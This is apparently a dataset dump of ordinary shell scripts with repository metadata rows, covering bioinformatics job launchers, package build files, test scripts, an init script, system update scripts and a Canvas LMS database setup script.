############### BIONANO MALIGNER SECTION #################
BIONANOCLEAN=false
if $CLEANALL; then BIONANOCLEAN=true; fi
REC_ENZ=BssSI
REC_SEQ=CACGAG
BIONANOBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/opticalmap/malignerautomation
BIONANOSCRIPTS=${BIONANOBASE}/scripts/
BIONANOCONFIGS=${BIONANOBASE}/configs/
BIONANOFOFNS=${BIONANOBASE}/fofns/
BIONANOCONFIG=${BIONANOCONFIGS}/maligner-config-sciara.cfg
MAPSFOFN=${BIONANOFOFNS}/bionanomaps.examp2.fofn
BIONANORUN=${BIONANOSCRIPTS}/auto-malign.sh
############### LONG READ SECTION #################
## LONG READ LOCATIONS
ONT=~/data/scratch/minion2016/fast5fastqs/allReadsFromAllONTlibsCombined.fastq
PACBIO=~/data/scratch/pac_bio_data/filt/all_subreads.fastq
## LONG2PE READ LOCATIONS
ONT1=/gpfs/data/sgerbi/jurban/scratch/minion2016/fast5fastqs/molreads/long2pe/ontmol-1.fastq
ONT2=/gpfs/data/sgerbi/jurban/scratch/minion2016/fast5fastqs/molreads/long2pe/ontmol-2.fastq
PACBIO1=/gpfs/data/sgerbi/jurban/scratch/pac_bio_data/filt/long2pe/pacbio-1.fastq
PACBIO2=/gpfs/data/sgerbi/jurban/scratch/pac_bio_data/filt/long2pe/pacbio-2.fastq
## RUN INFO LOCATIONS
LRBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/longreadeval
LRSCRIPTS=${LRBASE}/scripts/
AUTOLR=${LRSCRIPTS}/auto-lrpipe.sh
LRCONFIGS=${LRBASE}/configs/
LR_DEFAULT_CFG=longread-config-sciara.cfg
# NOTE(review): LR_ALE_MODULE_CFG is defined but never selected -- TODO confirm.
LR_ALE_MODULE_CFG=ale-module-longread-config-sciara.cfg
LRCONFIG=${LRCONFIGS}/${LR_DEFAULT_CFG}
## OTHER OPTIONS
LRCLEAN=false
if $CLEANALL; then LRCLEAN=true; fi
############### TRANSCRIPT SECTION #################
TRANJOBPRE=transcript
TBLASTX=true
TRANSNJOBS=100
TRANSCLEAN=false
if $CLEANALL; then TRANSCLEAN=true; fi
TRANSBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/transcripteval
TRANSSCRIPTS=${TRANSBASE}/scripts/
TRANSCONFIGS=${TRANSBASE}/configs/
TRANSFOFNS=${TRANSBASE}/fofns/
TRANSCONFIG=${TRANSCONFIGS}/trans-config-sciara.cfg ## does both blastn and tblastx
OTHERSPP_TRANSCONFIG=${TRANSCONFIGS}/other-spp-trans-config-sciara.cfg
TRANSFOFN=${TRANSFOFNS}/
TRANSRUN=${TRANSSCRIPTS}/auto-trans.sh
TRANS1=~/data/illumina/generalTranscriptome/trinity/trinity_out_dir/Trinity.fasta
TRANS2=/gpfs/data/sgerbi/jurban/flies/dmel/dmel-all-transcript-r6.14.fasta
TRANS3=/gpfs/data/sgerbi/jurban/flies/anopheles_gambiae/anopheles-gambiae-pesttranscriptsagamp46.fa
TRANJOBPRE1=${TRANJOBPRE}_sciara_
TRANJOBPRE2=${TRANJOBPRE}_dmel_
TRANJOBPRE3=${TRANJOBPRE}_mosquito_
############### PEPTIDE SECTION #################
## Evaluate with peptides
PEPJOBPRE=peptide
PEPNJOBS=100
PEPCLEAN=false
if $CLEANALL; then PEPCLEAN=true; fi
PEPBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/peptideval
PEPSCRIPTS=${PEPBASE}/scripts/
PEPCONFIGS=${PEPBASE}/configs/
PEPFOFNS=${PEPBASE}/fofns/
PEPCONFIG=${PEPCONFIGS}/peptide-config-sciara.cfg ## does both blastn and tblastx
PEPFOFN=${PEPFOFNS}/
PEPRUN=${PEPSCRIPTS}/auto-pep.sh
PEP2=/gpfs/data/sgerbi/jurban/flies/dmel/dmel-all-translation-r6.14.fasta
PEP3=/gpfs/data/sgerbi/jurban/flies/anopheles_gambiae/anopheles-gambiae-pestpeptidesagamp46.fa
PEPJOBPRE2=${PEPJOBPRE}_dmel_
PEPJOBPRE3=${PEPJOBPRE}_mosquito_
############### KNOWN SEQUENCES SECTION #################
## Also evaluate Known Seqs
## USE TRANS variables (e.g. TRANSSCRIPTS etc) for everything other than these 4 things
KNOWNJOBPRE=knownseqs_
KNOWNTBLASTX=false
KNOWNNJOBS=1
KNOWNCLEAN=false
if $CLEANALL; then KNOWNCLEAN=true; fi
KNOWNCONFIG=${TRANSCONFIGS}/known-config-sciara.cfg
KNOWNSEQS=/gpfs/data/sgerbi/jurban/sciaraknownseqs/allCoprophilaNTSeqOnNCBI.fa
############### RNASEQ SECTION #################
#$RNARUN $RNASCRIPTS $RNACONFIG $RNACLEAN $ASMFOFN $RNAFOFN
RNACLEAN=false
if $CLEANALL; then RNACLEAN=true; fi
RNABASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/rnaseqeval
RNASCRIPTS=${RNABASE}/scripts/
RNACONFIGS=${RNABASE}/configs/
RNAFOFNS=${RNABASE}/fofns/
RNACONFIG=${RNACONFIGS}/rnaseq-config-sciara.cfg
RNAFOFN=${RNAFOFNS}/reads.fofn
RNARUN=${RNASCRIPTS}/auto-rnaseqeval.sh
RNAFOFN=`readlink -f $RNAFOFN`
############### BUSCO V3 SECTION #################
BUSCOV3CLEAN=true
BUSCOV3BASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/buscov3
BUSCOV3SCRIPTS=${BUSCOV3BASE}/scripts/
BUSCOV3CONFIGS=${BUSCOV3BASE}/configs/
BUSCOV3FOFNS=${BUSCOV3BASE}/fofns/
BUSCOV3CONFIG=${BUSCOV3CONFIGS}/buscov3-config-sciara.cfg
BUSCOV3RUN=${BUSCOV3SCRIPTS}/auto-buscov3.sh
##############################################
##############################################
##############################################
################ EXECUTE #####################
# Optional pre-processing: rename contigs and/or drop contigs < MINLEN into
# eval_asms/, then point ASMFOFN at the re-written assemblies.
NEWDIR=eval_asms
if $RENAME || [ $MINLEN -gt 0 ]; then mkdir -p ${NEWDIR} ; fi
## IF OPTED; rename and/or set min contig length
if $RENAME; then echo renaming....;
  if [ $MINLEN -gt 0 ]; then echo ...also setting min contig length to $MINLEN ; fi
  while read fasta; do
    b=`basename $fasta`
    fasta_name_changer.py -f $fasta -r contig -n --key key-${b}.txt | extractFastxEntries.py --fa --stdin --minlen $MINLEN > ${NEWDIR}/${b}
  done < $ASMFOFN
elif [ $MINLEN -gt 0 ] && [ $RENAME != "true" ]; then echo ...setting min contig length to $MINLEN ... ;
  while read fasta; do
    b=`basename $fasta`
    extractFastxEntries.py --fa -f $fasta --minlen $MINLEN > ${NEWDIR}/${b}
  done < $ASMFOFN
fi
## CREATE AND USE UPDATED FOFN
if $RENAME || [ $MINLEN -gt 0 ]; then
  for f in ${NEWDIR}/*; do
    readlink -f $f;
  done > renamed.fofn
  ASMFOFN=`readlink -f renamed.fofn`
fi
#for f in ${NEWDIR}/*; do
#  readlink -f $f;
#done > renamed.fofn
#ASMFOFN=`readlink -f renamed.fofn`
## BEGIN LAUNCHING JOBS
# Each pipeline gets its own sub-directory; launchers are expected to submit
# SLURM jobs and return promptly.
echo shortread
mkdir -p shortread
cd shortread
##bash $SHORTAUTO $ASMFOFN $LR1 $LR2 $R1 $R2 $EvalThese $SHORTSCRIPTS
bash $SHORTAUTO $ASMFOFN $LR1 $LR2 $R1 $R2 $SHORTCONFIG $SHORTSCRIPTS
cd ../
echo bionano
mkdir -p bionano
cd bionano
$BIONANORUN $BIONANOCLEAN $BIONANOCONFIG $ASMFOFN $MAPSFOFN $REC_ENZ $REC_SEQ $BIONANOSCRIPTS
cd ../
echo longread
mkdir -p longread
cd longread
bash $AUTOLR $LRCLEAN $LRCONFIG $ASMFOFN $LRSCRIPTS $ONT $PACBIO $ONT1 $ONT2 $PACBIO1 $PACBIO2
cd ../
echo blast_analyses
mkdir -p blast_analyses
cd blast_analyses
echo transcriptome
mkdir -p transcriptome
cd transcriptome
$TRANSRUN $TRANSSCRIPTS $TRANSCONFIG $TRANSCLEAN $ASMFOFN $TRANS1 $TRANSNJOBS $TBLASTX $TRANJOBPRE1
cd ../
echo dmel
mkdir -p dmel
cd dmel
$TRANSRUN $TRANSSCRIPTS $OTHERSPP_TRANSCONFIG $TRANSCLEAN $ASMFOFN $TRANS2 $TRANSNJOBS $TBLASTX $TRANJOBPRE2
cd ../
echo anopheles
mkdir -p anopheles
cd anopheles
$TRANSRUN $TRANSSCRIPTS $OTHERSPP_TRANSCONFIG $TRANSCLEAN $ASMFOFN $TRANS3 $TRANSNJOBS $TBLASTX $TRANJOBPRE3
cd ../
echo dmel_peptides
mkdir -p dmel_peptides
cd dmel_peptides
$PEPRUN $PEPSCRIPTS $PEPCONFIG $PEPCLEAN $ASMFOFN $PEP2 $PEPNJOBS $PEPJOBPRE2
cd ../
echo anopheles_peptides
mkdir -p anopheles_peptides
cd anopheles_peptides
$PEPRUN $PEPSCRIPTS $PEPCONFIG $PEPCLEAN $ASMFOFN $PEP3 $PEPNJOBS $PEPJOBPRE3
cd ../
echo knownseqs
mkdir -p knownseqs
cd knownseqs
$TRANSRUN $TRANSSCRIPTS $KNOWNCONFIG $KNOWNCLEAN $ASMFOFN $KNOWNSEQS $KNOWNNJOBS $KNOWNTBLASTX $KNOWNJOBPRE
cd ../
#leave blast_analyses
cd ../
echo rnaseq
mkdir -p rnaseq
cd rnaseq
$RNARUN $RNASCRIPTS $RNACONFIG $RNACLEAN $ASMFOFN $RNAFOFN
cd ../
echo buscov3
mkdir -p buscov3
cd buscov3
$BUSCOV3RUN $BUSCOV3SCRIPTS $BUSCOV3CONFIG $BUSCOV3CLEAN $ASMFOFN
cd ../
################ EXECUTE #####################
##############################################
##############################################
##############################################
| true |
134d034f0b348beb33b82ae683225ee6c7bc1468 | Shell | isabella232/aomi | /tests/integration/exec_context.bats | UTF-8 | 352 | 2.515625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bats
# -*- mode: Shell-script;bash -*-
# Bats integration tests: verify the aomi CLI can be invoked as an installed
# entry point, as a source file, and as a package directory. The helpers
# (aomi_run, $CIDIR, bats' `run`/$status) come from the loaded helper file.
load helper
@test "can run aomi normally" {
    aomi_run help
}
@test "can run aomi as a dev py" {
    cd "$CIDIR" || exit 1
    run python aomi.py help
    [ "$status" -eq 0 ]
}
@test "can run aomi as a dev dir" {
    cd "$CIDIR" || exit 1
    run python ./aomi help
    [ "$status" -eq 0 ]
}
| true |
a9cc49a1c3d01034639660f3d2381175a9638ae6 | Shell | sed-inf-u-szeged/RMeasure | /ScopeControlService/scopeControlService.sh | UTF-8 | 1,243 | 3.4375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/sh
### BEGIN INIT INFO
# Provides: reparaService
### END INIT INFO
# SysV init script for the REPARA ScopeControlService daemon.
# Usage: scopeControlService.sh {start|stop|restart|force-reload|status}
DAEMON=/home/repara/ScopeControlService/scopeControlService
# NOTE: the leading space is load-bearing -- see start_reparaService_daemon.
DAEMONARGS=" -c /home/repara/ScopeControlService/scopeControlService.cfg"
# LSB helpers: log_daemon_msg, log_end_msg, status_of_proc.
. /lib/lsb/init-functions
# Start the daemon via start-stop-daemon.
# NOTE(review): the unquoted `--$DAEMONARGS` word-splits into `--` followed by
# `-c <cfg>`, i.e. everything after `--` is passed to the daemon itself.
# Odd but apparently intentional -- confirm before "fixing" the quoting.
start_reparaService_daemon() {
    start-stop-daemon --start --quiet --exec $DAEMON --$DAEMONARGS
}
# Stop the daemon with SIGTERM; --oknodo makes "already stopped" a success.
stop_reparaService_daemon() {
    start-stop-daemon --stop --quiet --signal TERM --oknodo --exec $DAEMON
}
# Dispatch on the requested init action.
case "$1" in
  start)
    log_daemon_msg "Starting distributed compiler daemon" "reparaService"
    start_reparaService_daemon
    log_end_msg $?
    ;;
  stop)
    log_daemon_msg "Stopping distributed compiler daemon" "reparaService"
    stop_reparaService_daemon
    log_end_msg $?
    ;;
  restart|force-reload)
    log_daemon_msg "Restarting distributed compiler daemon" "reparaService"
    stop_reparaService_daemon
    # Give the old process a moment to exit before starting a new one.
    sleep 1
    start_reparaService_daemon
    log_end_msg $?
    ;;
  status)
    status_of_proc "$DAEMON" "reparaService" && exit 0 || exit $?
    ;;
  *)
    N=/etc/init.d/reparaService
    echo "Usage: $N {start|stop|restart|force-reload|status}" >&2
    exit 1
    ;;
esac
exit 0
| true |
756241d15634e0572e586e90e34090e9c763bd8f | Shell | ponty/pyscreenshot | /tests/vagrant/ubudep.sh | UTF-8 | 507 | 2.546875 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
# Provision an Ubuntu test VM: non-interactive apt, full upgrade, locale
# setup, and the tooling needed by the test suite.
export DEBIAN_FRONTEND=noninteractive
# Shared apt-get invocation: keep existing config files on conflicts and
# answer yes to every prompt. (Kept as a word-split string: this is /bin/sh,
# so arrays are not available.)
apt_get="apt-get -o Dpkg::Options::=--force-confold -o Dpkg::Options::=--force-confdef -y --allow-downgrades --allow-remove-essential --allow-change-held-packages"
# Refresh the package index, then upgrade everything already installed.
$apt_get update
$apt_get dist-upgrade
update-locale LANG=en_US.UTF-8 LANGUAGE=en.UTF-8
# echo 'export export LC_ALL=C' >> /home/vagrant/.profile
# Convenience tools plus pip for installing Python packages.
$apt_get install -y mc htop python3-pip
sudo python3 -m pip install tox -U
#sudo apt-get install -y x11-utils xvfb
sudo python3 -m pip install pillow -U | true |
0d683d9a8f2a4af113f6144fd3a04510159c97e9 | Shell | filipsPL/autowx | /kalibruj.sh | UTF-8 | 420 | 3.015625 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
# Calibrate the RTL-SDR dongle's frequency offset with `kal`, seeding the
# run with the previously measured shift and persisting the new one.
channel=115
# Last measured shift; a missing/unreadable state file just yields an empty
# string (stderr silenced so a first run does not print a cat error).
recentShift=$(cat var/dongleshift.txt 2> /dev/null)
# Accept only a plain (possibly negative) decimal number...
re='^-?[0-9]+([.][0-9]+)?$'
if ! [[ $recentShift =~ $re ]] ; then
  #echo "error: Not a number" >&2;
  # ...otherwise fall back to a sane default starting shift.
  recentShift=1.5
fi
#kal -s GSM900 -e 61
#kal -c 116 -g 49.6 -e $recentShift 2> /dev/null | tail -1 | cut -d " " -f 4 | tee var/dongleshift.txt
# Scan the chosen GSM channel, keep the 4th field of kal's last output line
# (the measured offset), and both show it and store it for the next run.
kal -c $channel -g 49.6 -e $recentShift 2> /dev/null | tail -1 | cut -d " " -f 4 | tee var/dongleshift.txt
| true |
3756b2e62ec130de1407e60c18664e6466ab7b69 | Shell | harisokanovic/archlinux-packages | /cantarell-fonts/trunk/PKGBUILD | UTF-8 | 641 | 2.578125 | 3 | [] | no_license | # $Id$
# Maintainer: Jan Alexander Steffens (heftig) <jan.steffens@gmail.com>
# Arch Linux PKGBUILD for the GNOME Cantarell font family.
pkgname=cantarell-fonts
pkgver=0.0.16
pkgrel=2
pkgdesc="Cantarell font family"
arch=('any')
url="https://git.gnome.org/browse/cantarell-fonts"
license=('GPL2')
depends=('fontconfig')
# Post-install hooks (font cache refresh) live in this .install file.
install=cantarell-fonts.install
# ${pkgver::3} is the MAJOR.MINOR prefix used in the GNOME download path.
source=(https://download.gnome.org/sources/$pkgname/${pkgver::3}/$pkgname-${pkgver}.tar.xz)
sha256sums=('15bf87555321556750bc68ace360f3df420359a8ab257e15c44fb69710152f1c')
# Configure and build; fontconfig snippets go to /etc/fonts/conf.avail.
build() {
  cd $pkgname-$pkgver
  ./configure --prefix=/usr --with-configdir=/etc/fonts/conf.avail
  make
}
# Stage the built files into the package directory.
package() {
  cd $pkgname-$pkgver
  make DESTDIR="${pkgdir}" install
}
# vim:set ts=2 sw=2 et:
| true |
39eecc04b25666113c000717d655f126382ffc9d | Shell | stangls/dotfiles-1 | /lib/common.lib.sh | UTF-8 | 1,540 | 4.25 | 4 | [] | no_license | #!/bin/bash
#
# Shell function library
#
# Ideas / TODO:
# - Error reporting functions: http://linuxcommand.org/wss0150.php
# - Use bash's "set -u" to check for unset variables
# invoke CMD [ARGS...]
# Echo the command when $VERBOSE is "true"; run it when $REALLY is "true"
# (dry-run support). Returns the command's status, or 0 in dry-run mode.
function invoke() {
    # "$@" (quoted) fixes the old unquoted `echo $@`, which re-split and
    # re-globbed arguments containing whitespace or wildcards.
    $VERBOSE && echo "$@"
    if $REALLY ; then
        "$@"
    else
        true
    fi
}
# fexists NAME
# True when NAME resolves to a function, builtin, alias, or executable.
function fexists() {
    # Quoted: an empty or whitespace-containing argument no longer makes
    # `type -t` see the wrong number of words.
    type -t "$1" >/dev/null
}
# checkpipestatus STATUS...
# Return the first non-zero status from the given list (e.g.
# "${PIPESTATUS[@]}"), or 0 when every stage succeeded.
function checkpipestatus {
    for i in "$@"; do
        # -gt is a numeric comparison; the old `[[ ( $i > 0 ) ]]` was a
        # *lexical* string comparison that only worked by accident for
        # exit codes without leading zeros.
        if [ "$i" -gt 0 ]; then
            return "$i"
        fi
    done
    return 0
}
# parts_ending_on DIR SUFFIX
# List entries of DIR, printing each name with the trailing SUFFIX removed;
# entries not ending in SUFFIX are skipped.
# NOTE(review): relies on GNU awk -- match() with a third (array) argument is
# a gawk extension; SUFFIX is spliced into the regex unescaped, so regex
# metacharacters in it are interpreted -- confirm callers only pass plain
# suffixes. Parsing `ls` output also breaks on names containing newlines.
function parts_ending_on() {
    ls $1 | awk 'match($0, /^(.*)'$2'$/, m) { print m[1]; }'
}
# relpath PATH [BASE]
# Print PATH relative to BASE (default: current directory).
# Arguments are passed via sys.argv so quotes/backslashes in paths can no
# longer break out of -- or inject into -- the inline Python snippet (the old
# version interpolated "$1" directly into the source string).
# NOTE: keeps the Python 2 print-statement syntax of the original.
function relpath() {
    python -c "import os.path, sys; print os.path.relpath(sys.argv[1], sys.argv[2])" "$1" "${2:-$PWD}"
}
# Emit the standard header for generated shell include files: a bash
# shebang, an explanatory comment, and a trailing blank line.
function print_shellscript_header() {
    printf '%s\n' '#!/bin/bash' '# This is a shell include file, no need to run it.' ''
}
# configure CONFIGFILE < configuration-script
# Ensure CONFIGFILE exists, seeding it from stdin (prefixed with the
# standard include-file header) when it does not. Returns 1 when no file
# name was given; stdin is left unread when the file already exists.
# NOTE(review): CONFIGFILE is assigned globally (no `local`), so a call
# clobbers any caller variable of the same name -- confirm that is intended.
function configure() {
    CONFIGFILE="$1" # Config file is argument #1
    [ -n "$CONFIGFILE" ] || return 1
    # Configuration script on STDIN
    # 1. Create a configuration file if it doesn't exist
    [ -e "$CONFIGFILE" ] || (
        print_shellscript_header
        cat
    ) > "$CONFIGFILE"
    # 2. Emit code to load the configuration file
    #echo "source \"$CONFIGFILE\""
    # 3. Emit the remaining configuration on STDIN, if any
    #    We need to re-eval the configuration, so any missing variables
    #    (e.g. in case of an old config file) get set to useful defaults
    #    This has no effect if a configuration file was created in step 1
    #    but in exactly this case it is not neccessary.
    #cat
}
| true |
20bd16ffe233d01b9a099d625eef0e76679fccac | Shell | msys2/MINGW-packages | /mingw-w64-python-apipkg/PKGBUILD | UTF-8 | 1,626 | 2.609375 | 3 | [
"BSD-3-Clause"
] | permissive | # Maintainer: Andrew Sun <adsun701@gmail.com>
# MSYS2/mingw-w64 PKGBUILD for the Python "apipkg" package, built for every
# supported mingw environment with the PEP 517 build/installer toolchain.
_realname=apipkg
pkgbase=mingw-w64-python-${_realname}
pkgname=("${MINGW_PACKAGE_PREFIX}-python-${_realname}")
# The old python3-named package was folded into this one.
provides=("${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
conflicts=("${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
replaces=("${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
pkgver=3.0.1
pkgrel=3
pkgdesc="Namespace control and lazy-import mechanism (mingw-w64)"
arch=('any')
mingw_arch=('mingw32' 'mingw64' 'ucrt64' 'clang64' 'clang32' 'clangarm64')
url="https://github.com/pytest-dev/apipkg"
license=('spdx:MIT')
depends=("${MINGW_PACKAGE_PREFIX}-python")
makedepends=("${MINGW_PACKAGE_PREFIX}-python-build"
             "${MINGW_PACKAGE_PREFIX}-python-installer"
             "${MINGW_PACKAGE_PREFIX}-python-hatchling"
             "${MINGW_PACKAGE_PREFIX}-python-hatch-vcs")
options=('staticlibs' 'strip' '!debug')
# ${_realname::1} is the first letter, as the PyPI source layout requires.
source=("https://pypi.org/packages/source/${_realname::1}/${_realname}/${_realname}-${pkgver}.tar.gz")
sha256sums=('f8c021adafc9132ac2fba9fd3c5768365d0a8c10aa375fb15e329f1fce8a5f01')
# Build a wheel out-of-tree in a per-environment copy of the source.
build() {
  cp -r "${_realname}-${pkgver}" "python-build-${MSYSTEM}" && cd "python-build-${MSYSTEM}"
  ${MINGW_PREFIX}/bin/python -m build --wheel --skip-dependency-check --no-isolation
}
check() {
  cd "${srcdir}/python-build-${MSYSTEM}"
  ${MINGW_PREFIX}/bin/python -m pytest
}
# Install the wheel; MSYS2_ARG_CONV_EXCL stops MSYS2 from mangling --prefix.
package() {
  cd "${srcdir}/python-build-${MSYSTEM}"
  MSYS2_ARG_CONV_EXCL="--prefix=" \
  ${MINGW_PREFIX}/bin/python -m installer --prefix=${MINGW_PREFIX} \
    --destdir="${pkgdir}" dist/*.whl
  install -Dm644 LICENSE "${pkgdir}${MINGW_PREFIX}/share/licenses/python-${_realname}/LICENSE"
}
| true |
88c11c21b745af6a2aa428d1febd6bbd8e7f002c | Shell | itsguysmiley/vpl-samples | /vpl_evaluate.sh | UTF-8 | 2,060 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# Default evaluate script for VPL
# @Copyright 2014 Juan Carlos Rodríguez-del-Pino
# @License http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
# @Author Juan Carlos Rodríguez-del-Pino <jcrodriguez@dis.ulpgc.es>
#
# Builds the grading harness: prepares the submission via vpl_run.sh, then
# compiles vpl_evaluate.cpp (with grade/time constants prepended) into
# .vpl_tester and emits a vpl_execution script that runs it. When no
# executable could be produced, vpl_execution instead prints a
# "compilation failed" grade report.
#load VPL environment vars
. common_script.sh
# Defaults when the environment did not provide limits.
# NOTE(review): SECONDS is bash's auto-incrementing elapsed-time counter, so
# it is normally always set; assigning it here *resets* the counter to 20.
if [ "$SECONDS" = "" ] ; then
	export SECONDS=20
fi
if [ "$VPL_GRADEMIN" = "" ] ; then
	export VPL_GRADEMIN=0
	export VPL_GRADEMAX=10
fi
#exist run script?
if [ ! -s vpl_run.sh ] ; then
	echo "I'm sorry, but I haven't a default action to evaluate the type of submitted files"
else
	#avoid conflict with C++ compilation
	mv vpl_evaluate.cpp vpl_evaluate.cpp.save
	#Prepare run
	./vpl_run.sh >>vpl_compilation_error.txt 2>&1
	cat vpl_compilation_error.txt
	if [ -f vpl_execution ] ; then
		mv vpl_execution vpl_test
		if [ -f vpl_evaluate.cases ] ; then
			mv vpl_evaluate.cases evaluate.cases
		else
			echo "Error need file 'vpl_evaluate.cases' to make an evaluation"
			exit 1
		fi
		#Add constants to vpl_evaluate.cpp
		echo "const float VPL_GRADEMIN=$VPL_GRADEMIN;" >vpl_evaluate.cpp
		echo "const float VPL_GRADEMAX=$VPL_GRADEMAX;" >>vpl_evaluate.cpp
		# Time budget for the tester: total allowance minus seconds already
		# elapsed ($SECONDS) minus one.
		let VPL_MAXTIME=VPL_MAXTIME-$SECONDS-1;
		echo "const int VPL_MAXTIME=$VPL_MAXTIME;" >>vpl_evaluate.cpp
		cat vpl_evaluate.cpp.save >> vpl_evaluate.cpp
		check_program g++
		g++ vpl_evaluate.cpp -g -lm -lutil -o .vpl_tester
		if [ ! -f .vpl_tester ] ; then
			echo "Error compiling evaluation program"
		else
			# Generated runner simply executes the compiled tester.
			echo "#!/bin/bash" >> vpl_execution
			echo "./.vpl_tester" >> vpl_execution
		fi
	else
		# No executable was produced: synthesize a vpl_execution that
		# reports the compilation failure and the minimum grade.
		echo "#!/bin/bash" >> vpl_execution
		echo "echo" >> vpl_execution
		echo "echo '<|--'" >> vpl_execution
		echo "echo '-$VPL_COMPILATIONFAILED'" >> vpl_execution
		if [ -f vpl_wexecution ] ; then
			echo "echo '======================'" >> vpl_execution
			echo "echo 'It seems you are trying to test a program with a graphic user interface'" >> vpl_execution
		fi
		echo "echo '--|>'" >> vpl_execution
		echo "echo" >> vpl_execution
		echo "echo 'Grade :=>>$VPL_GRADEMIN'" >> vpl_execution
	fi
	chmod +x vpl_execution
fi | true |
56706b3e7543fa6977fea98aebd31f2761535236 | Shell | duncanmichel/Programming-Problem-Solutions | /HackerRank/Bash/misc.sh | UTF-8 | 851 | 4.125 | 4 | [] | no_license | #!/bin/bash
# HackerRank Bash practice solutions.
# Fix: the original used bare BEGINCOMMENT/ENDCOMMENT marker words, which the
# shell actually tried to *execute* -- spamming "command not found" errors and
# running the problem-statement prose as commands. The statements are now
# no-op quoted heredocs fed to `:`, which is inert and expands nothing.
: <<'ENDCOMMENT'
Your task is to use for loops to display only odd natural numbers from 1 to 99.
ENDCOMMENT
for i in {1..99..2}
do
    echo $i
done

: <<'ENDCOMMENT'
Four lines containing the sum (), difference (), product (), and quotient (), respectively.
ENDCOMMENT
read num1
read num2
# Quoted operands keep expr well-formed; $( ) replaces legacy backticks.
echo $(expr "$num1" + "$num2")
echo $(expr "$num1" - "$num2")
echo $(expr "$num1" \* "$num2")
echo $(expr "$num1" / "$num2")

: <<'ENDCOMMENT'
Given two integers, X and Y, identify whether X>Y or X<Y or X=Y.
Exactly one of the following lines:
- X is less than Y
- X is greater than Y
- X is equal to Y
ENDCOMMENT
read num1
read num2
# Quoting keeps [ ... ] a two-operand numeric comparison even for odd input.
if [ "$num1" -gt "$num2" ]; then #VERY sensitive to spacing in the conditional
    echo "X is greater than Y"
elif [ "$num1" -lt "$num2" ]; then
    echo "X is less than Y"
elif [ "$num1" -eq "$num2" ]; then
    echo "X is equal to Y"
fi
| true |
0a76043f11204cffd4ecfd4f79f8396d09a63048 | Shell | stefan-langenmaier/lxc-gentoo-build-tools | /update-gentoo-base-container.sh | UTF-8 | 946 | 2.921875 | 3 | [] | no_license | #!/bin/bash
# Update a Gentoo LXC base container kept on a btrfs subvolume: mount it,
# start the container, run a world update (or drop into an interactive
# shell when "interactive" is passed), then stop the container.
# Usage: update-gentoo-base-container.sh <container-name> [interactive]
# -e abort on error, -u unset vars are errors, -x trace commands.
set -eux
CONTAINER_NAME=$1
#CONTAINER_NAME=gentoo-base-container
#CONTAINER_NAME=cubox-i
# Ensure the full root and the container's btrfs subvolume are mounted.
mountpoint -q /mnt/full-root/ || mount /mnt/full-root/ #|| die "Failed mounting full root"
mkdir -p /var/lib/lxc/${CONTAINER_NAME}
mountpoint -q /var/lib/lxc/${CONTAINER_NAME} || mount -o subvol=vols/${CONTAINER_NAME} /dev/mmcblk1p3 /var/lib/lxc/${CONTAINER_NAME}
# install world
lxc-start -n ${CONTAINER_NAME}
if [[ $# -gt 1 && "$2" == "interactive" ]] ; then
	lxc-attach -n ${CONTAINER_NAME}
else
	# copy configs from template
	[[ -d template/${CONTAINER_NAME} ]] && cp -a template/${CONTAINER_NAME}/* /var/lib/lxc/${CONTAINER_NAME}
	lxc-attach -n ${CONTAINER_NAME} -- eselect news read
	lxc-attach -n ${CONTAINER_NAME} -- emerge -uDN world --with-bdeps=y --backtrack=200
	lxc-attach -n ${CONTAINER_NAME} -- etc-update -p # do trivial merges
	# Drop leftover build artifacts to keep the base image small.
	lxc-attach -n ${CONTAINER_NAME} -- rm /var/tmp/portage/* -rf
fi
lxc-stop -n ${CONTAINER_NAME}
| true |
b71ca34d97fb87375f877daa91fc533d46219143 | Shell | nguyen-tich-duy/canvas-lms-test | /initdb.sh | UTF-8 | 1,949 | 3.765625 | 4 | [
"LicenseRef-scancode-public-domain"
] | permissive | #!/bin/bash
set -eo pipefail
IFS=$'\n\t'
# -e: immediately exit if any command has a non-zero exit status
# -o: prevents errors in a pipeline from being masked
# IFS new value is less likely to cause confusing bugs when looping arrays or arguments (e.g. $@)
# Rebuild the Canvas LMS database from scratch inside docker-compose.
# Work from the script's own directory and load environment + helpers
# (message, exec_command, confirm_command, prompt come from common.sh).
BASE_PATH=$(dirname $(realpath $0))
cd $BASE_PATH
source ./.env.production
source ./.env
source scripts/common.sh
message "Update git repo"
exec_command "git submodule update --init --depth 1 canvas-lms"
message "Copy new settings"
exec_command "cp -r config/canvas-lms/* canvas-lms/config"
# Host-side address of the docker0 bridge, for containers to reach the host.
export DOCKER_HOST_IP=$(ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+')
# True (exit 0) when Rails can open a database connection inside the web
# container; all output is discarded.
function database_exists {
  docker-compose run --rm web \
    bundle exec rails runner 'ActiveRecord::Base.connection' &> /dev/null
}
# (Re)create the database. DESTRUCTIVE: an existing database is dropped
# after an interactive "NUKE" confirmation. The multi-line message strings
# below are runtime data and must stay byte-identical.
function create_db {
  # Verify the container user can write db/structure.sql (migrations need it).
  if ! docker-compose run --no-deps --rm web touch db/structure.sql; then
    message \
"The 'docker' user is not allowed to write to db/structure.sql. We need write
permissions so we can run migrations."
    touch db/structure.sql
    confirm_command 'chmod a+rw db/structure.sql' || true
  fi
  if database_exists; then
    message \
'An existing database was found.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
This script will destroy ALL EXISTING DATA if it continues
If you want to migrate the existing database, use migrate.sh
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'
    message 'About to run "bundle exec rake db:drop"'
    # Abort unless the operator types NUKE exactly.
